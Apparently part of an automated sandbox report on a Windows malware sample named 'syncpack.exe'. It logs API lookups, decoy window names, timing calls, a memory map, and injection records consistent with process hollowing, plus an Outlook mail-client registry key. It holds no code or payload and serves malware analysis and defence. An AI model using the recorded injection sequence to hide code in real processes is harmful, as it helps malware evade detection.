Get Address c:\windows\syswow64\oleaut32.dll function = OleLoadPictureEx, address_out = 0x75a670a1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = DispCallFunc, address_out = 0x75a13dcf True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = LoadTypeLibEx, address_out = 0x75a107b7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = UnRegisterTypeLib, address_out = 0x75a31ca9 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = CreateTypeLib2, address_out = 0x75a18e70 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDateFromUdate, address_out = 0x75a17684 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarUdateFromDate, address_out = 0x75a1cc98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetAltMonthNames, address_out = 0x75a4903a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNumFromParseNum, address_out = 0x75a16231 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarParseNumFromStr, address_out = 0x75a15fea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR4, address_out = 0x75a23f94 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromR8, address_out = 0x75a24e9e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromDate, address_out = 0x75a4db72 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromI4, address_out = 0x75a32a8c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecFromCy, address_out = 0x75a4d737 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarR4FromDec, address_out = 0x75a4e015 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromTypeInfo, address_out = 0x75a4cc3d True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = GetRecordInfoFromGuids, address_out = 0x75a4d1c4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetRecordInfo, address_out = 0x75a4d48c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetRecordInfo, address_out = 0x75a4d4c6 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayGetIID, address_out = 0x75a4d509 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArraySetIID, address_out = 0x75a1e7bb True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCopyData, address_out = 0x75a1e496 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayAllocDescriptorEx, address_out = 0x75a1ddf1 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = SafeArrayCreateEx, address_out = 0x75a4d53f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormat, address_out = 0x75a52055 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatDateTime, address_out = 0x75a520ea True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatNumber, address_out = 0x75a52151 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatPercent, address_out = 0x75a521f5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFormatCurrency, address_out = 0x75a52288 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarWeekdayName, address_out = 0x75a52335 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMonthName, address_out = 0x75a523d5 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAdd, address_out = 0x75a25934 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAnd, address_out = 0x75a25a98 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCat, address_out = 0x75a259b4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDiv, address_out = 0x75a7e405 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarEqv, address_out = 0x75a7ef07 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarIdiv, address_out = 0x75a7f00a True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarImp, address_out = 0x75a7ef47 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMod, address_out = 0x75a7f15e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarMul, address_out = 0x75a7dbd4 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarOr, address_out = 0x75a7ecfa True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarPow, address_out = 0x75a7ea66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarSub, address_out = 0x75a7d332 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarXor, address_out = 0x75a7ee2e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarAbs, address_out = 0x75a7ca11 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarFix, address_out = 0x75a7cc5f True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarInt, address_out = 0x75a7cde7 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNeg, address_out = 0x75a7c802 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarNot, address_out = 0x75a7ec66 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarRound, address_out = 0x75a7d155 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCmp, address_out = 0x75a1b0dc True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecAdd, address_out = 0x75a35f3e True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarDecCmp, address_out = 0x75a24fd0 True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCat, address_out = 0x75a20d2c True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarCyMulI4, address_out = 0x75a359ed True 1
Fn
Get Address c:\windows\syswow64\oleaut32.dll function = VarBstrCmp, address_out = 0x75a0f8b8 True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstanceEx, address_out = 0x75c29d4e True 1
Fn
Get Address c:\windows\syswow64\ole32.dll function = CLSIDFromProgIDEx, address_out = 0x75bf0782 True 1
Fn
Get Address c:\windows\syswow64\sxs.dll function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x75317685 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetSystemMetrics, address_out = 0x771d7d2f True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromWindow, address_out = 0x771e3150 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromRect, address_out = 0x771fe7a0 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = MonitorFromPoint, address_out = 0x771e5281 True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = EnumDisplayMonitors, address_out = 0x771e451a True 1
Fn
Get Address c:\windows\syswow64\user32.dll function = GetMonitorInfoA, address_out = 0x771e4413 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtAllocateVirtualMemory, address_out = 0x77bffab0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x75fc5223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x75fc103d True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtUnmapViewOfSection, address_out = 0x77bffc70 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtWriteVirtualMemory, address_out = 0x77bffe04 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtGetContextThread, address_out = 0x77c00c20 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtSetContextThread, address_out = 0x77c01910 True 1
Fn
Get Address c:\windows\syswow64\ntdll.dll function = NtResumeThread, address_out = 0x77c00058 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x75fd174d True 1
Fn
Window (21)
»
Operation Window Name Additional Information Success Count Logfile
Create - class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Create - class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Create Sorting Algorithm Comparison wndproc_parameter = 0 True 1
Fn
Create RadixSort wndproc_parameter = 0 True 1
Fn
Create MergeSort wndproc_parameter = 0 True 1
Fn
Create QuickSort wndproc_parameter = 0 True 1
Fn
Create HeapSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create InsertSort wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Create - wndproc_parameter = 0 True 1
Fn
Set Attribute - class_name = VBMsoStdCompMgr, index = 0, new_long = 246816924 False 1
Fn
Keyboard (1)
»
Operation Additional Information Success Count Logfile
Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
System (1106)
»
Operation Additional Information Success Count Logfile
Sleep duration = 0 milliseconds (0.000 seconds) True 29
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:24 (Local Time) True 16
Fn
Get Time type = Ticks, time = 252752 True 1
Fn
Get Time type = Ticks, time = 252784 True 1
Fn
Get Time type = Ticks, time = 252924 True 6
Fn
Get Time type = Ticks, time = 252940 True 5
Fn
Get Time type = Ticks, time = 252971 True 5
Fn
Get Time type = Ticks, time = 252986 True 5
Fn
Get Time type = Ticks, time = 253002 True 5
Fn
Get Time type = Ticks, time = 253033 True 5
Fn
Get Time type = Ticks, time = 253064 True 1
Fn
Get Time type = Ticks, time = 253080 True 4
Fn
Get Time type = Ticks, time = 253096 True 5
Fn
Get Time type = Ticks, time = 253111 True 5
Fn
Get Time type = Ticks, time = 253142 True 5
Fn
Get Time type = Ticks, time = 253158 True 5
Fn
Get Time type = Ticks, time = 253189 True 5
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:25 (Local Time) True 17
Fn
Get Time type = Ticks, time = 253205 True 5
Fn
Get Time type = Ticks, time = 253220 True 5
Fn
Get Time type = Ticks, time = 253236 True 1
Fn
Get Time type = Ticks, time = 253252 True 4
Fn
Get Time type = Ticks, time = 253267 True 5
Fn
Get Time type = Ticks, time = 253283 True 5
Fn
Get Time type = Ticks, time = 253314 True 15
Fn
Get Time type = Ticks, time = 253330 True 1
Fn
Get Time type = Ticks, time = 253345 True 14
Fn
Get Time type = Ticks, time = 253361 True 10
Fn
Get Time type = Ticks, time = 253376 True 15
Fn
Get Time type = Ticks, time = 253392 True 10
Fn
Get Time type = Ticks, time = 253408 True 5
Fn
Get Time type = Ticks, time = 253423 True 5
Fn
Get Time type = Ticks, time = 253439 True 5
Fn
Get Time type = Ticks, time = 253454 True 10
Fn
Get Time type = Ticks, time = 253470 True 10
Fn
Get Time type = Ticks, time = 253486 True 10
Fn
Get Time type = Ticks, time = 253517 True 10
Fn
Get Time type = Ticks, time = 253532 True 10
Fn
Get Time type = Ticks, time = 253548 True 15
Fn
Get Time type = Ticks, time = 253564 True 10
Fn
Get Time type = Ticks, time = 253579 True 5
Fn
Get Time type = Ticks, time = 253595 True 5
Fn
Get Time type = Ticks, time = 253610 True 5
Fn
Get Time type = Ticks, time = 253642 True 10
Fn
Get Time type = Ticks, time = 253657 True 5
Fn
Get Time type = Ticks, time = 253704 True 5
Fn
Get Time type = Ticks, time = 253735 True 10
Fn
Get Time type = Ticks, time = 253751 True 10
Fn
Get Time type = Ticks, time = 253766 True 25
Fn
Get Time type = Ticks, time = 253782 True 40
Fn
Get Time type = Ticks, time = 253798 True 16
Fn
Get Time type = Ticks, time = 253813 True 4
Fn
Get Time type = Ticks, time = 253829 True 10
Fn
Get Time type = Ticks, time = 253844 True 10
Fn
Get Time type = Ticks, time = 253860 True 5
Fn
Get Time type = Ticks, time = 253907 True 5
Fn
Get Time type = Ticks, time = 253922 True 1
Fn
Get Time type = Ticks, time = 253969 True 5
Fn
Get Time type = Ticks, time = 253985 True 14
Fn
Get Time type = Ticks, time = 254000 True 10
Fn
Get Time type = Ticks, time = 254016 True 5
Fn
Get Time type = Ticks, time = 254032 True 5
Fn
Get Time type = Ticks, time = 254047 True 10
Fn
Get Time type = Ticks, time = 254063 True 5
Fn
Get Time type = Ticks, time = 254078 True 5
Fn
Get Time type = Ticks, time = 254094 True 5
Fn
Get Time type = Ticks, time = 254110 True 5
Fn
Get Time type = Ticks, time = 254125 True 10
Fn
Get Time type = Ticks, time = 254141 True 15
Fn
Get Time type = Ticks, time = 254156 True 5
Fn
Get Time type = Ticks, time = 254172 True 5
Fn
Get Time type = Ticks, time = 254188 True 10
Fn
Get Time type = Ticks, time = 254203 True 10
Fn
Get Time type = Ticks, time = 254219 True 5
Fn
Get Time type = Ticks, time = 254234 True 5
Fn
Get Time type = Ticks, time = 254250 True 5
Fn
Get Time type = Ticks, time = 254266 True 5
Fn
Get Time type = Ticks, time = 254281 True 5
Fn
Get Time type = Ticks, time = 254297 True 5
Fn
Get Time type = Ticks, time = 254328 True 15
Fn
Get Time type = Ticks, time = 254344 True 5
Fn
Get Time type = Ticks, time = 254359 True 5
Fn
Get Time type = Ticks, time = 254375 True 5
Fn
Get Time type = Ticks, time = 254390 True 5
Fn
Get Time type = Ticks, time = 254406 True 5
Fn
Get Time type = Ticks, time = 254422 True 5
Fn
Get Time type = Ticks, time = 254437 True 5
Fn
Get Time type = Ticks, time = 254453 True 10
Fn
Get Time type = Ticks, time = 254468 True 5
Fn
Get Time type = Ticks, time = 254484 True 20
Fn
Get Time type = Ticks, time = 254515 True 6
Fn
Get Time type = Ticks, time = 254531 True 49
Fn
Get Time type = Ticks, time = 254546 True 45
Fn
Get Time type = Ticks, time = 254562 True 35
Fn
Get Time type = Ticks, time = 254578 True 5
Fn
Get Time type = Ticks, time = 254593 True 40
Fn
Get Time type = Ticks, time = 254609 True 20
Fn
Get Time type = Ticks, time = 254624 True 5
Fn
Get Time type = Ticks, time = 254640 True 45
Fn
Get Time type = Ticks, time = 254656 True 45
Fn
Get Time type = Ticks, time = 254671 True 30
Fn
Get Time type = Ticks, time = 254687 True 35
Fn
Get Time type = Ticks, time = 254702 True 17
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:28 (Local Time) True 1
Fn
Get Time type = Local Time, time = 2018-06-26 00:54:40 (Local Time) True 3
Fn
Get Time type = Ticks, time = 268259 True 1
Fn
Get Time type = Ticks, time = 268306 True 1
Fn
Register Hook type = WH_MSGFILTER, hookproc_address = 0x729a1e09 True 1
Fn
Get Info type = Operating System True 3
Fn
Get Info type = Operating System True 2
Fn
Get Info type = Hardware Information True 1
Fn
Get Info type = Windows Directory, result_out = C:\Windows True 1
Fn
Mutex (1)
»
Operation Additional Information Success Count Logfile
Create - True 1
Fn
Environment (1)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 1
Fn
Data
Process #10: syncpack.exe
47 0
»
Information Value
ID #10
File Name c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe
Command Line "C:\Users\kFT6uTQW\AppData\Local\Microsoft\Windows\syncpack.exe" "C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp"
Initial Working Directory C:\Users\kFT6uTQW\Desktop\
Monitor Start Time: 00:03:18, Reason: Child Process
Unmonitor End Time: 00:05:08, Reason: Terminated by Timeout
Monitor Duration 00:01:50
OS Process Information
»
Information Value
PID 0x8a0
Parent PID 0xb70 (c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe)
Is Created or Modified Executable True
Integrity Level Medium
Username XABNCPUWKW\kFT6uTQW
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x 608
0x A8
0x 79C
0x 280
0x 740
0x 978
0x 9B0
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False -
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False -
pagefile_0x0000000000210000 0x00210000 0x00212fff Pagefile Backed Memory Readable True False False -
windowsshell.manifest 0x00220000 0x00220fff Memory Mapped File Readable False False False -
pagefile_0x0000000000220000 0x00220000 0x00222fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False -
private_0x0000000000240000 0x00240000 0x00243fff Private Memory Readable, Writable True False False -
private_0x0000000000250000 0x00250000 0x00267fff Private Memory Readable, Writable True False False -
private_0x0000000000270000 0x00270000 0x002effff Private Memory Readable, Writable True False False -
pagefile_0x00000000002f0000 0x002f0000 0x003cefff Pagefile Backed Memory Readable True False False -
private_0x00000000003d0000 0x003d0000 0x003dffff Private Memory Readable, Writable True False False -
private_0x00000000003e0000 0x003e0000 0x003effff Private Memory Readable, Writable True False False -
private_0x00000000003f0000 0x003f0000 0x003f0fff Private Memory Readable, Writable True False False -
wi 0x00400000 0x0041afff Memory Mapped File Readable, Writable, Executable True False False -
private_0x0000000000420000 0x00420000 0x0042ffff Private Memory - True False False -
private_0x0000000000430000 0x00430000 0x0043ffff Private Memory Readable, Writable True False False -
private_0x0000000000440000 0x00440000 0x0044ffff Private Memory Readable, Writable True False False -
private_0x0000000000450000 0x00450000 0x0045ffff Private Memory Readable, Writable True False False -
private_0x0000000000460000 0x00460000 0x0046ffff Private Memory Readable, Writable True False False -
private_0x0000000000470000 0x00470000 0x0047ffff Private Memory - True False False -
private_0x0000000000480000 0x00480000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x0049ffff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004affff Private Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x004cffff Private Memory Readable, Writable True False False -
private_0x00000000004d0000 0x004d0000 0x004dffff Private Memory Readable, Writable True False False -
private_0x00000000004e0000 0x004e0000 0x004effff Private Memory Readable, Writable True False False -
private_0x00000000004f0000 0x004f0000 0x005effff Private Memory Readable, Writable True False False -
pagefile_0x00000000005f0000 0x005f0000 0x00777fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000780000 0x00780000 0x00900fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000910000 0x00910000 0x01d0ffff Pagefile Backed Memory Readable True False False -
private_0x0000000001d10000 0x01d10000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001d10000 0x01d10000 0x01d1ffff Private Memory Readable, Writable True False False -
private_0x0000000001d20000 0x01d20000 0x01d9ffff Private Memory Readable, Writable True False False -
private_0x0000000001da0000 0x01da0000 0x01ddffff Private Memory Readable, Writable True False False -
private_0x0000000001de0000 0x01de0000 0x01deffff Private Memory Readable, Writable True False False -
private_0x0000000001df0000 0x01df0000 0x01e2ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e30000 0x01e30000 0x01e30fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e40000 0x01e40000 0x01e40fff Private Memory Readable, Writable True False False -
pagefile_0x0000000001e50000 0x01e50000 0x01e50fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x0000000001e60000 0x01e60000 0x01e62fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e70000 0x01e70000 0x01e70fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001e80000 0x01e80000 0x01e80fff Pagefile Backed Memory Readable True False False -
private_0x0000000001e90000 0x01e90000 0x01e9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001ea0000 0x01ea0000 0x01f5ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000001ea0000 0x01ea0000 0x01ea2fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000001eb0000 0x01eb0000 0x01ebffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f5ffff Private Memory Readable, Writable True False False -
private_0x0000000001f60000 0x01f60000 0x01f9ffff Private Memory Readable, Writable True False False -
private_0x0000000001fa0000 0x01fa0000 0x01fdffff Private Memory Readable, Writable True False False -
private_0x0000000002020000 0x02020000 0x0205ffff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x0224ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002060000 0x02060000 0x0215ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000021b0000 0x021b0000 0x0224ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0244ffff Private Memory Readable, Writable True False False -
private_0x0000000002250000 0x02250000 0x0234ffff Private Memory Readable, Writable True False False -
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False -
private_0x0000000002390000 0x02390000 0x023cffff Private Memory Readable, Writable True False False -
private_0x00000000023d0000 0x023d0000 0x0240ffff Private Memory Readable, Writable True False False -
private_0x0000000002410000 0x02410000 0x0244ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02450000 0x0271efff Memory Mapped File Readable False False False -
office.odf 0x02720000 0x02959fff Memory Mapped File Readable False False False -
pagefile_0x0000000002960000 0x02960000 0x02d5ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02e60fff Private Memory Readable, Writable True False False -
private_0x0000000002d60000 0x02d60000 0x02d9ffff Private Memory Readable, Writable True False False -
private_0x0000000002e50000 0x02e50000 0x02e8ffff Private Memory Readable, Writable True False False -
private_0x0000000002e90000 0x02e90000 0x02f8ffff Private Memory Readable, Writable True False False -
private_0x0000000004290000 0x04290000 0x0438ffff Private Memory Readable, Writable True False False -
private_0x0000000004390000 0x04390000 0x0448ffff Private Memory Readable, Writable True False False -
private_0x0000000004490000 0x04490000 0x0458ffff Private Memory Readable, Writable True False False -
private_0x0000000004590000 0x04590000 0x0468ffff Private Memory Readable, Writable True False False -
mspst32.dll 0x6fb80000 0x6fc8cfff Memory Mapped File Readable, Writable, Executable False False False -
contab32.dll 0x6fc90000 0x6fcb0fff Memory Mapped File Readable, Writable, Executable False False False -
sfc_os.dll 0x6fcc0000 0x6fcccfff Memory Mapped File Readable, Writable, Executable False False False -
sfc.dll 0x6fcf0000 0x6fcf2fff Memory Mapped File Readable, Writable, Executable False False False -
mapir.dll 0x6fd00000 0x6fe30fff Memory Mapped File Readable, Writable, Executable False False False -
olmapi32.dll 0x6feb0000 0x70181fff Memory Mapped File Readable, Writable, Executable False False False -
mso.dll 0x71490000 0x724a7fff Memory Mapped File Readable, Writable, Executable False False False -
riched20.dll 0x744d0000 0x745d8fff Memory Mapped File Readable, Writable, Executable False False False -
version.dll 0x74640000 0x74648fff Memory Mapped File Readable, Writable, Executable False False False -
comctl32.dll 0x747f0000 0x7498dfff Memory Mapped File Readable, Writable, Executable False False False -
msi.dll 0x74a70000 0x74caffff Memory Mapped File Readable, Writable, Executable False False False -
msvcr80.dll 0x74cb0000 0x74d4afff Memory Mapped File Readable, Writable, Executable False False False -
dwmapi.dll 0x74ec0000 0x74ed2fff Memory Mapped File Readable, Writable, Executable False False False -
uxtheme.dll 0x74ee0000 0x74f5ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x74f70000 0x74f77fff Memory Mapped File Readable, Writable, Executable False False False -
wow64win.dll 0x74f80000 0x74fdbfff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x74fe0000 0x7501efff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x75730000 0x7573bfff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x75740000 0x7579ffff Memory Mapped File Readable, Writable, Executable False False False -
usp10.dll 0x757d0000 0x7586cfff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x759e0000 0x759f8fff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x75a00000 0x75a8efff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x75a90000 0x75aeffff Memory Mapped File Readable, Writable, Executable False False False -
ole32.dll 0x75be0000 0x75d3bfff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x75d40000 0x75dcffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x75dd0000 0x75e7bfff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x75e80000 0x75ec5fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x75fb0000 0x760bffff Memory Mapped File Readable, Writable, Executable False False False -
lpk.dll 0x76380000 0x76389fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76390000 0x76412fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x76480000 0x770c9fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x770d0000 0x771bffff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x771c0000 0x772bffff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x773c0000 0x77416fff Memory Mapped File Readable, Writable, Executable False False False -
msctf.dll 0x77670000 0x7773bfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00000000777e0000 0x777e0000 0x778fefff Private Memory Readable, Writable, Executable True False False -
private_0x0000000077900000 0x77900000 0x779f9fff Private Memory Readable, Writable, Executable True False False -
ntdll.dll 0x77a00000 0x77ba8fff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x77be0000 0x77d5ffff Memory Mapped File Readable, Writable, Executable False False False -
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False -
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False -
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False -
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False -
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False -
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False -
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False -
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False -
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False -
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False -
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False -
Injection Information
»
Injection Type Source Process Source Os Thread ID Information Success Count Logfile
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x400000, size = 102400 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efde008, size = 4 True 1
Fn
Data
Modify Memory #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c address = 0x7efdf010, size = 4 True 1
Fn
Data
Modify Control Flow #6: c:\users\kft6utqw\appdata\local\microsoft\windows\syncpack.exe 0x86c os_tid = 0x608, address = 0x0 True 1
Fn
Host Behavior
COM (1)
»
Operation Class Interface Additional Information Success Count Logfile
Create ED475410-B0D6-11D2-8C3B-00104B2A6676 9240A6CD-AF41-11D2-8C3B-00104B2A6676 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
File (5)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp desired_access = FILE_APPEND_DATA True 1
Fn
Open STD_INPUT_HANDLE - True 1
Fn
Open STD_OUTPUT_HANDLE - True 1
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Write C:\Users\kFT6uTQW\AppData\Local\Temp\D3D3.tmp size = 50 True 1
Fn
Data
Registry (2)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Clients\Mail\Microsoft Outlook - True 1
Fn
